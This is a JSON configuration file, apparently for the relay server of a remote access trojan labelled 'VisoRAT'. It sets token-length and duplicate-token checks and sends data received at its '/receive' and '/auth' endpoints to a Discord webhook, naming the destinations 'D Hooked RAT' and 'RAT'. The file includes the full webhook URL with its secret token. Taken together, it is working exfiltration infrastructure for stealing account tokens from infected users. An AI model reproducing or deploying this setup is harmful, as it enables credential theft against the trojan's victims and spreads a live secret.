{
    "security": {
        "rate_limit_seconds": 600,
        "min_token_length": 128,
        "check_duplicate_tokens": true
    },
    "endpoints": {
        "/receive": {
            "webhooks": [
                {
                    "url": "https://discord.com/api/webhooks/1336047945845575764/t2FoU1mLwGNk0vclGcqC0yq04N8CSPBJMF-vwvt2Wt__jjmF4F0j5lFjcieAKZPnk4bU",
                    "name": "D Hooked RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                },
                {
                    "url": "https://discord.com/api/webhooks/1336047945845575764/t2FoU1mLwGNk0vclGcqC0yq04N8CSPBJMF-vwvt2Wt__jjmF4F0j5lFjcieAKZPnk4bU", 
                    "name": "RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                }
            ]
        },
        "/auth": {
            "webhooks": [
                {
                    "url": "https://discord.com/api/webhooks/1336047945845575764/t2FoU1mLwGNk0vclGcqC0yq04N8CSPBJMF-vwvt2Wt__jjmF4F0j5lFjcieAKZPnk4bU",
                    "name": "Not D Hooked RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                }
            ]
        }
    }

}
